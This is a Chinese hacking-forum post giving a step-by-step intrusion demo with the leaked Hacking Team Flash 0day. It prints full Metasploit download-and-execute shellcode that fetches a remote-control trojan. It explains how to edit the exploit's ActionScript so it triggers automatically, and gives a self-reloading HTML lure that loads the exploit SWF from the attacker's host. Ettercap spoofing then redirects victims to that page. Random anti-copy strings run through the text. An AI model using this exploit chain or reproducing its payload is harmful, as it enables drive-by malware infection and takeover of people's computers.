找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1513|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

K/ W/ i w' U" B6 |, } 三、flash 0day之手工代码修改制作下载者实例入侵演示 " T) P% P( P0 U }

: I+ Q& _1 h% }4 m

1 i, C- F/ C2 T: X 利用到的工具: / w, P+ \) W8 }) z

c& W6 U5 ?5 S. u8 j/ v( ]( I

$ X1 a2 X4 o: O/ g/ d1 g Msf 4 h U$ I! L# v! f' H

- [& [# Y& C5 p

" U7 m6 y% T# ^: O7 W Ettercap 1 ~; a1 h6 q, a4 S+ O. v; w

& V" x6 F& D5 e# ]* U" k# ]0 ]

6 w" x; \; P! N, W b# U! Q& v Adobe Flash CS6 1 _9 {1 |( Y r/ S4 m% F$ f7 e

- D' b- ?+ A; t5 t

, F h- \5 L# _7 \8 H' H1 b Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 : S( ]6 t I% i4 E3 l8 U& ]9 y

3 v/ i& y) r6 w6 E

. U1 I6 i* K% i5 }7 b$ w: R8 h 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options + v" ]2 [7 L8 \; O

3 L/ `! ~' \. O e$ Q6 n

7 d* H' K8 g9 A- P 如图: 6 I( a+ q( p- U f- b

1 E, f* n5 g8 S$ q' i3 d. f9 ]

4 A$ i9 p$ g; [9 v# i1 ^( w% t' D   " r) n9 _ T0 m. _7 l* u

+ m5 F# H! a8 u, b' D% a& k

1 a A6 e" z. |! i; e, z- n5 c   ( t8 N0 a( |# B) a6 d* m) J1 ]

9 H% E0 v0 V8 H6 b) H3 W

' x3 c% w( L7 X7 K: ~ 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 9 n7 r3 `4 q+ o+ {2 W) U, }

, a, j( V* h& r) y2 F9 n

2 j# }* k& ]; z j. k   / ~/ k- }0 [ G3 \5 H$ D

+ Z0 x3 h$ z* [& G+ t

+ J I( ~' h" g; q6 ?   5 r9 O& m# X, s1 u6 ]* b. o

, L9 h# f( ?3 K. D+ A2 L; \* X8 U

4 `* ?; _4 @# s% @; G! U8 V 然后执行generate -t dword生成shellcode,如下: ) q* Z3 X, U P9 a3 Y2 ]

) g9 M1 n) W6 u8 H' F

5 c8 `, x' a4 }( i) S) T o   / g0 a6 ]! y5 {

3 X7 S4 _4 C8 p1 `5 V9 B

# ~# r, e5 ^( e3 X 复制代码到文本下便于我们一会编辑flash exp,如下: 9 |, w! a* ]/ E* Z4 S0 I& \

* T$ ]' X. f; ^

8 y \( @! S% z' y9 b P 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 6 ?4 u5 G+ r- G9 r# G

# a" E# o2 b6 g

$ ]& \4 @) a) t/ q4 _1 K4 t9 f 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, - o5 `. d1 J1 t' E' d; u

1 `6 ]. }! _4 B# H: }2 \2 m

8 z! s( J, Y) t+ }. P 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 1 O: Y0 S9 N; X, s3 ?

/ }7 ?- W; D& ~

" n) ^% }7 j( |; T' i! T 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 1 L. {! Z2 F; m& f6 T5 ]/ ^; J

: j2 d& M% F; e7 B, n$ C9 i

( _: |3 B5 t: {( ] 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, , v4 z- W8 V$ [" J

/ U% M/ q _% F; J0 z. T5 u! c& k

4 ?; u; ~! J7 ^- S: H. L/ ] 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 3 k( d7 g f. y- o+ j

# S( e$ z) B C5 F9 V

9 O8 H( I& E2 v 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, . b. V- C! G6 d; p3 X

5 c0 K' g W8 H' J& X9 ^

. D8 `$ G8 {4 l P5 I 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 3 ?2 n6 o9 e; i' O. a( ?2 ?

, F' ]9 R2 A. L V

# h+ R" D# S$ R1 c% v; G) l 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, # E* d3 C! t! R' h. J

# X3 o: k7 |, Z" i2 z

6 P+ Q2 I( H: _: t$ L1 r 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, Q' J, r# m0 k, `' |( Z& s

! k q' L F& z* h# z$ \

/ k% h/ g9 I4 |! k& @ 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, / L M& ? b+ ?2 n' r

$ d; u. S$ q7 W9 O) U8 s. r1 U

" E( v- N& r4 h7 Z0 K 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, " g' {, s; t, \

# @9 ~: L1 [: B. S! F

5 x, ]" \+ x( _5 A* \- D/ t 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, - s( Z+ I# v8 C) P2 K

8 z" w/ Q9 X! Y* w5 y- ]: _

) _& I- E$ g' }- D/ n5 s' h 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 : K2 ~& ^ g3 a( ]2 v k

& Y, x- N/ r. K$ T3 d

6 [+ T9 V! u3 C! k& `3 N8 X- b# n! D   $ V0 z/ N0 J' ^" T7 D6 t

9 V! e' d$ `9 w. R! M, r j" `

4 s' H5 X. W i$ K8 F   * H# z2 N7 `: C" C# ]0 D& P

6 Q" k3 c9 b4 V. U1 v

* a, r" I* b5 b7 N/ B' v- H 下面我们来修改flash 0day exp,需要修改三个文件,分别为: . k0 C6 e* B' a7 T _

9 w! z4 e; `3 c* O# S

2 B! W! }) U3 Y# M7 U9 M" S   5 x( @9 R' s% @ N

2 {' \% g" R+ f4 z G, j

0 k2 I# G6 m: c' o% D6 D2 U 先修改ShellWin32.as,部分源代码如图: " \- ]2 J" ^; t' Y, Q) s" I, v

4 E( m$ U* F' f; R% R

0 J! \; X9 M! c   5 Q+ y, ]# d1 A

6 c7 N$ D- Z! ^) D1 j b! I

- S9 z' I( }! p) j 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: C% D% C# E- ?# \

( ^$ O' n5 c% W$ x4 m# D

3 x6 V# B3 H& _! v8 ^$ V   $ ~6 P9 j. v Z0 f3 x% `9 t( P% k

8 [; D9 v' d" B$ G8 J

8 o3 N; e' A3 h O/ Q 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 5 d1 e' R6 U o, q" v2 d

+ f5 p( Q* k3 k6 u4 o+ y2 n5 v8 ]

! D7 A+ B2 B9 _8 g+ M   M. M( R, \( B- W% @* R/ `- ~6 I9 ]

+ l6 n9 Q7 I# C! {% W1 R1 g6 g

. P6 |0 z& @* P7 _- g4 k& ? 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: ' r' z% \/ C0 P$ ~

" h& V) d4 U. L @

0 X2 V2 C' J/ P4 o+ q6 |/ |8 c   M! D$ ]7 N# Z! |9 q! U3 j

6 Q- G, F- H8 I% k- T2 @

s: L; {0 s' j4 w% e/ \   4 B0 k2 N. M1 b; E

: G- p6 f# y! f) P2 w- F1 Q

! p9 s% n: T7 w. N) d* c   8 N' j _- L" _5 ^' l2 x

, [# h2 g( w) g& a7 D

: T8 o+ e4 x. _5 N! J$ F- D5 a 然后点保存,下面我们来编译一下,打开 0 R* o4 w4 T# p8 _$ B& S( }

5 F% Y6 I$ ]1 ?- Y9 M

% {7 u5 Z* P! n; h1 B- I exp1.fla然后点文件-发布,看看编译没错误 ) d$ O' ~& z* y/ |/ k. x+ H( ?1 q

- C2 r/ _; \1 j# Z: a4 l

2 a% O' S( U- y   0 d7 h( A, N" W

- K X& k+ ^% M/ `5 i9 m

# {- H" b. @9 w3 I' G- G   3 i- t- V6 ]# f7 Q

# A8 K3 ?" b- L% ~6 ^2 {& k

' c# s) r% c2 G* g! A! u6 {   * X( o X% O, R

0 a& V/ I4 p8 H

j9 Z0 \- d( k; o4 Z: }2 f   , D, W" s2 ~' c" ?$ ?$ }

8 z6 o% H+ @' @$ B- u# J( r# ~, D

) J$ H. B5 P& Q8 h 然后我们把生成的 1 }- e% f6 N+ U+ J/ p4 f% W

( e" D1 m) M* O% _1 A

* o9 {5 N( ? N" e exp1.swf丢到kailinux /var/www/html下: 7 D" D8 |/ Z# ^0 b3 |

$ ?5 \2 Y/ O/ b' d2 P4 o1 i2 w( P n

0 V! I$ G9 F1 [" @5 o* _0 E 然后把这段代码好好编辑一下 $ Q R% C; B- ^7 P9 a

% i D' V2 P% |) @# @ Q

) R Q4 c6 b. L# a- u- H& O   / D2 o0 R, K4 ^: J. P

) z- j8 `. M, t: l

0 |* B& N9 n6 v, {& l- w/ X   8 u" m$ a7 Q6 [9 s/ s' U

0 S$ ^) ^, B! ?6 T

9 f) W/ ?0 u. G' ^) j1 Z- w   , {1 ^ U) E3 W- `: S9 H' t

, Z$ H c/ _0 V/ h

3 `4 S, x1 G1 N H9 g$ E8 P* k$ ?   % D2 ^' r! ^9 _6 A

" Y) r! ~+ \& g1 o

9 ]# J+ d M% A- H( A$ S   2 e8 M3 M$ U8 d

8 p5 r9 d! n# ]% L; H8 N

. ^3 {9 D% _& U, ?   u' I) M1 f0 \6 Z4 V/ c2 z: x5 B. q

& X* q* X: z. Y. r# }$ ~# }5 D

1 x* P, l5 w. o2 A n <!DOCTYPE html> - d% ~: @& b+ w

' p1 F) `, F8 T! l2 K6 n

3 J9 ^$ V- J3 l$ Y: K; P& h9 C <html> 1 { x+ G' w6 c

( T9 W& g! {7 p, v; b

+ s: w5 [& H2 g* A; | <head> * w% V0 o% Z* f1 z

: Q( e4 l- `6 k7 X

% E7 X" a3 U/ Z; O <meta http-equiv="Content-Type" content="text/html; % \2 t: I! b, v/ d

3 i3 o+ k3 }7 V8 n! n& P. |" [4 V

0 n& \* |0 i, a, O9 S j: D, D charset=utf-8"/> ( {( E( s& K; ~2 M9 z3 G% p' r

& @. e1 k Y9 f! e7 t: E P

% z. |# I- ?! A2 H( a </head> . r" ]: |" \; {( h, H

% b' c7 ^; O: m5 p

) G: {+ S9 g0 V6 @& w+ ^ <body> " V/ A7 |# d, R( a& h4 x+ q

$ g! H3 f# y, q$ `3 t

z* V9 H' |; R* P4 V- q7 Z <h2> Please wait, the requested page is loading...</h2> 6 `4 w2 u! B3 h& h

# A! B6 j9 v% d" {. [+ _9 }

+ h2 ~( h4 k, E <br> ! b1 E! [9 ~6 m# ?- B

; ]* A0 c. H' F3 A T+ B: H9 w

( h" a- B6 Z I$ u <OBJECT * K6 G) Z6 m3 f7 o* I% r

* ?( Z9 ?1 u" x) K

- j# t% q* H. Q! C classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 6 j, ?3 s3 w- g, }* _: F# \. ^

" e9 R5 X8 `9 ~

8 ?: y6 b' B4 B- _ VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 1 y( u5 Z: z* `. M, s1 u1 _! \: P

; b4 u3 Z/ A; a [2 I: m

0 l6 y, V" Q- \- H# G9 ^ </body> * g8 ^* Z- D8 z% o6 C% N: z

# f9 t1 r* W, y1 n2 q: T! g

/ v/ d9 n0 I3 `' c1 X8 Y <script> 9 ^, c& [/ V: c) I& _( D

8 F0 H5 B8 f* @* y

* f6 ]" Y% e# u, w     setTimeout(function () { - u. U! J' c: [! G

7 o" G8 P) b% \- r2 ?

/ g, w% a' k# d& V+ B5 P* `6 F/ Z          " ^4 u2 n1 m! |" ]& M

/ k! g! Y* K1 n, X, h5 ]1 \2 X8 C V

1 t8 |& ]0 P& D window.location.reload(); 0 S8 F- g" d6 H& m0 }

- h; }* Q0 [: Z# q% K7 R8 j$ T

7 d% |6 W' Z! l6 k- ^8 J8 j     }, 10000); & \7 M2 i: a! c$ g* S

& ~% x& @0 e; [+ ?; n

2 U |9 l8 M) y) v, u7 @) r5 X+ x* O   5 F& C6 P. m; `) O

/ p+ `# f7 r' U2 c5 |

5 c! `9 T# W0 `& x </script> 4 b* L( x8 f2 }: p

4 b4 s; s. _3 h2 V

8 V% [# Y- \# D2 Z: f; O3 Z3 ^& h </html> , G/ h$ ^2 A- Y8 q0 H: |! y

4 X% y( a0 _6 Y1 a: A! j

) n) p J; j1 v6 ]% ]3 B   - l& P) x8 J( {0 Q; c

% O3 `6 \3 z. l* T T7 I# ]) j

' b% G/ @4 @* H8 U( K 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ! U& [. }9 o' ~: {' p$ x

+ N! a1 g& j9 q: L" D

' m# F8 _: o" i6 J' `   # T2 N, i4 S- ~' x4 \9 P5 n% v" J

& [$ ~, |; Y+ \1 [4 M

& G' [0 j; M% i& v+ |& s4 L( A8 N   5 C$ Z8 I1 ]0 {) D- C- j$ N- s

) o; a, R( i3 N; j' n

; ? U, V) p1 o( B! U   $ G# x6 k' Q# }5 F+ U

- |7 {& q4 O. U% w' v0 e

' ~2 I2 Y, O# z( D$ \+ }: `6 a+ _   4 w3 D% k" _" L9 C o

1 Q6 s2 k4 l1 F, m, b- d9 t% m

2 B: {. ]$ {. p; `! M) O/ y+ d8 \   1 U7 a& B0 h( p- F& r( [

/ z' w: X) F% M. z

, u6 ?3 Z& ]! h5 n 下面我们用ettercap欺骗如图: 7 x- C; B4 c& c7 P; p; r$ S9 W

+ ?' {* d. K, D7 j+ z1 T7 @; J6 {& f

; n! \! a i( N" M) D$ K. i   " b) Q; o2 l$ L" |. x6 _5 @

( y2 j1 Z' a& B4 z2 J" c; Z

: B! I+ h- h+ u. w* H7 X# P   4 J4 y& h \: [

' h( q$ u, r+ ~( \. h' l

/ X. y6 i1 `( L6 l. ^+ w+ T3 x2 M 下面我们随便访问个网站看看: " [% o5 J4 b$ K4 L7 b! i6 D& d

3 A" r9 K5 {/ X3 b* W" I

- u/ a( m# h- ?, h6 p$ }. { 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: . E) _' n# b3 O% L, {+ a7 Z

* V9 I$ I# l& [5 }

5 E' b0 Z3 I" A5 k) p2 | h   8 b; n4 V) J* D

, ~: v3 p, q" }0 u" y4 [7 O

! a' I" d/ _( {6 d% i8 E) w 我们看另一台, $ p# |- _! c- U

3 V( f5 a- h1 ?

. P% O8 J! L$ N# y/ W7 C0 R+ C 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 & s8 k- T$ ~6 \5 U. k) w" D

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表